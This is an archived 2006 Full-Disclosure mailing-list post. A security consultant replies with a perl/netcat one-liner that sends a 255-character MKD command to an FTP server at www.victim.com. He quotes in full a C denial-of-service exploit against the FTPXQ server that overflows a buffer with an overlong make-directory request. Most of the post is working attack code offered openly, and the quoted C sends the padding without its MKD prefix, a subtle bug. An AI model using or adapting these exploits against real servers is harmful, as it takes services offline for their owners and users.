lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 26 Oct 2006 19:28:27 +0200 From: Bernhard Mueller <research@...-consult.com> To: Full Disclosure <full-disclosure@...ts.grok.org.uk> Subject: Re: FTPXQ Denial of service exploit. Hello, And here's the bash/perl port: sk0L@...yl0n ~ $ perl -e "print "USER lol\r\nPASS lol\r\nMKD ".("A"x255)."\r\n" | nc www.victim.com 21 Cheers, Bernhard Federico Fazzi wrote: > /* > * 0xf_ftpxq.c - FTPXQ Denial of service exploit. > * Federico Fazzi <federico@...istici.org> > * > * advisory by Eric Sesterhenn. > * -- Server built using the WinsockQ from DataWizard Technologies. A > security > * -- vulnerability in the product allows remote attackers to overflow an > * -- internal buffer by providing an overly long "make directory" request. > * > * r20061025. > */ > > #include <stdio.h> > #include <stdlib.h> > #include <unistd.h> > #include <string.h> > #include <netdb.h> > #include <arpa/inet.h> > #include <sys/types.h> > #include <netinet/in.h> > #include <sys/socket.h> > > // AAAAAAAAAAAAAAAA..AA*255 in hex format. > char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" > "\x41\x41\x41\x41\x41\x41\x41\x41"; > > int main(int argc, char **argv) { > int sd; > socklen_t len; > struct sockaddr_in saddr; > struct hostent *he; > char buf[512], tmpbuf[128]; > > if(argc != 5) { > printf("FTPXQ Server - Denial of service exploit.\n" > "Federico Fazzi <federico@...istici.org>\n\n" > "usage: %s <hostname> <port> <user> <password>\n", argv[0]); > exit(1); > } > > if((he = gethostbyname(argv[1])) == NULL) { > perror("gethostbyname()"); > exit(1); > } > > // init socket > if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { > perror("socket()"); > exit(1); > } > > // setup struct > bzero((char *) &saddr, sizeof(saddr)); > saddr.sin_family = AF_INET; > bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length); > saddr.sin_port = htons(atoi(argv[2])); > > len = sizeof(struct sockaddr); > // init connection > if(connect(sd, (struct sockaddr *)&saddr, len) == -1) { > perror("connect()"); > exit(1); > } > printf("FTPXQ Server - Denial of service exploit.\n" > "Federico Fazzi <federico@...istici.org>\n" > "---------------------------------------\n"); > puts("connecting..\t\t done"); > > // sending a USER data to daemon > sprintf(buf, "USER %s\r\n", argv[3]); > write(sd, buf, strlen(buf)); > puts("sending USER data..\t done"); > > // sending a PASS data to daemon > sprintf(buf, "PASS %s\r\n", argv[4]); > write(sd, buf, strlen(buf)); > puts("sending PASS data..\t done"); > > // sending a BOF string with MKD command to host > sprintf(buf, "MKD %s", bof); > write(sd, bof, strlen(bof)); > puts("sending MKD bof string.. done"); > > // now checking if server i down > if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0) > puts("[!] server doesn't vulnerable"); > else > puts("[+] server getting down.. done"); > close(sd); > > return(0); > } > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- _____________________________________________________ DI (FH) Bernhard Mueller IT Security Consultant SEC-Consult Unternehmensberatung GmbH www.sec-consult.com A-1080 Vienna, Blindengasse 3 phone +43 1 8903043 0 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller@...-consult.com Advisor for your information security. ______________________________________________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists